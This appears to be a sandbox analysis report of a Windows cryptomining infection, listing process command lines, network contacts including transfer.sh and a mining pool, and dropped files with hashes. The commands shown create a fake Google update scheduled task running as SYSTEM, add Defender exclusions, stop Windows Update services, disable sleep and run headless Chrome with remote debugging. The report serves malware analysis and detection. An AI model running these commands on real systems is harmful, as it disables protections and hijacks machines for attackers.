C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 108

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {147C1EEA-47E8-4895-B8ED-04B4C7CA12A5} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=20001 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef5c19758,0x7fef5c19768,0x7fef5c19778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=808 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1232 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=20001 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1596 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1888 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2404 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2552 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1992 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2744 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp

Files

memory/2184-53-0x00000000012B0000-0x00000000012E4000-memory.dmp

memory/2184-54-0x00000000740C0000-0x00000000747AE000-memory.dmp

memory/2184-55-0x0000000000380000-0x0000000000386000-memory.dmp

memory/2184-56-0x0000000004810000-0x0000000004850000-memory.dmp

memory/2184-57-0x00000000740C0000-0x00000000747AE000-memory.dmp

memory/2184-58-0x0000000004810000-0x0000000004850000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA97B.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarABFD.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 42a68be0730ba92c69d428ff97552d83
SHA1 fb79c5d1b57ca4adf3e609219e9d7c846c1bc8b8
SHA256 1a0681d36f2bbe09f0477e85931a4cc7d8a2904c3746dcf75067a0c7ffd47ab7
SHA512 4d6ccd21d88529ad930df7afbb147b25194917f5467437e50853c980a655afbd93d91c9e4690501ea08ae2adc61b3034312b3a75b1cd1ca3484f06dcfb25d252

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/3032-133-0x00000000043C0000-0x00000000055E6000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2344-136-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/2344-138-0x0000000076E90000-0x0000000077039000-memory.dmp

memory/2344-137-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/2344-139-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/2344-140-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/2344-141-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/2344-142-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/2344-143-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/2344-144-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/1616-149-0x000000001B190000-0x000000001B472000-memory.dmp

memory/1616-150-0x000007FEF45D0000-0x000007FEF4F6D000-memory.dmp

memory/1616-152-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

memory/1616-151-0x0000000002590000-0x0000000002610000-memory.dmp

memory/1616-153-0x0000000002590000-0x0000000002610000-memory.dmp

memory/1616-155-0x0000000002590000-0x0000000002610000-memory.dmp

memory/1616-154-0x000007FEF45D0000-0x000007FEF4F6D000-memory.dmp

memory/2344-156-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/1616-157-0x0000000002590000-0x0000000002610000-memory.dmp

memory/2344-158-0x0000000076E90000-0x0000000077039000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2184-164-0x000000000BFE0000-0x000000000C26B000-memory.dmp

memory/1616-165-0x000007FEF45D0000-0x000007FEF4F6D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/612-168-0x0000000000840000-0x0000000000ACB000-memory.dmp

memory/612-169-0x0000000000840000-0x0000000000ACB000-memory.dmp

memory/2452-176-0x000000001B120000-0x000000001B402000-memory.dmp

memory/2452-178-0x000007FEF4560000-0x000007FEF4EFD000-memory.dmp

memory/2452-177-0x0000000002250000-0x0000000002258000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JXLDCY0XZTWZDJM8TO5J.temp

MD5 a72c5745e7416be8826ee38c64a56900
SHA1 60b950d228d567febf6f8c13dabda943b28cdb51
SHA256 59069a653fdf344b7c9d78dc818f36b301285437cf3ae2216829b3241692c65a
SHA512 dde0b403c4271101032841797cb9e11499d697eccab49d89b3c4bfa11192b4d6c2b3bf3c7bc611887126d3610b585592cfd7d5cb24d9625863579cecd6579fe8

memory/2452-179-0x00000000024B0000-0x0000000002530000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a72c5745e7416be8826ee38c64a56900
SHA1 60b950d228d567febf6f8c13dabda943b28cdb51
SHA256 59069a653fdf344b7c9d78dc818f36b301285437cf3ae2216829b3241692c65a
SHA512 dde0b403c4271101032841797cb9e11499d697eccab49d89b3c4bfa11192b4d6c2b3bf3c7bc611887126d3610b585592cfd7d5cb24d9625863579cecd6579fe8

memory/2452-180-0x000007FEF4560000-0x000007FEF4EFD000-memory.dmp

memory/2452-181-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/2452-182-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/2452-184-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1576-183-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1576-185-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1576-191-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1576-193-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1576-194-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1576-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-198-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2452-203-0x000007FEF4560000-0x000007FEF4EFD000-memory.dmp

memory/1576-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1576-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2344-211-0x0000000076E90000-0x0000000077039000-memory.dmp

memory/2344-209-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/1576-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1576-228-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-229-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-231-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-232-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-230-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-233-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/612-234-0x0000000000840000-0x0000000000ACB000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1444-236-0x000000013FB60000-0x0000000140D86000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1708-239-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-240-0x0000000076E90000-0x0000000077039000-memory.dmp

memory/1708-241-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-242-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-243-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-244-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-245-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-246-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-247-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1444-248-0x000000013FB60000-0x0000000140D86000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2184-253-0x000000000C1B0000-0x000000000C7E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1708-257-0x0000000076E90000-0x0000000077039000-memory.dmp

memory/2804-258-0x0000000077080000-0x0000000077082000-memory.dmp

memory/2804-256-0x0000000000090000-0x00000000006C4000-memory.dmp

memory/2804-259-0x0000000000090000-0x00000000006C4000-memory.dmp

memory/2184-260-0x00000000740C0000-0x00000000747AE000-memory.dmp

memory/2804-261-0x00000000007A0000-0x0000000000810000-memory.dmp

memory/2804-262-0x0000000074050000-0x000000007473E000-memory.dmp

memory/2804-263-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-264-0x0000000002C10000-0x0000000002C7C000-memory.dmp

memory/2804-265-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-266-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-267-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-268-0x0000000005720000-0x00000000057D2000-memory.dmp

memory/2804-269-0x0000000000090000-0x00000000006C4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Local State

MD5 c592149a8506cae8b54a31a52a3ea7ea
SHA1 e833bedc7405e5aceb7b8eac05eee18a36a7dea8
SHA256 991c0fd5fa2c563c05ef16bc24e461cedb7682e4eb42fdb19b5887fed5468709
SHA512 031cdb31524bee3c14e2e5b484ece86e85b4389897924fa272f4e817d286778dc0142235f725255ec79b3f74064a8914528af1c0551b7dea0c86866961947d22

\??\pipe\crashpad_1328_CRMLBDZQUQNOVZXC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1708-308-0x000000013FB60000-0x0000000140D86000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\LOG

MD5 8576316b1f156982d22e0c2096e35c4e
SHA1 4dffe4d0777eb25b0c76a6b7b20612f34b8e04f5
SHA256 9a67ddd70766ee4ee31c903eaee8ab93ecbcbcfe4fbe09718dd87d5c3c7c37d1
SHA512 50a0eb3987f6a1a0b06fb70bee1c74f52fcbb27c3bcb876d7cef9df9fb512670014056cc55a1d7e99ef853826c43cbb6cd38a60f147e1163eb62fb9fc6679a35

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\LOG.old

MD5 988514fc923d5b8040299ac3a531d24f
SHA1 c998e4171741dcc35f992ba638df1919a2432aef
SHA256 6784fa9f8ca570fde0a41b80513f7b612f6d7729a34cb9f921c9b16ba17f8043
SHA512 34362494a11d96de17e943353d25b7bf0c16a470a588028caa868ae1a2ce3add4d9b2430445266b527fd316c390cee58cd128392f89e95a4545e5d9ee2370c46

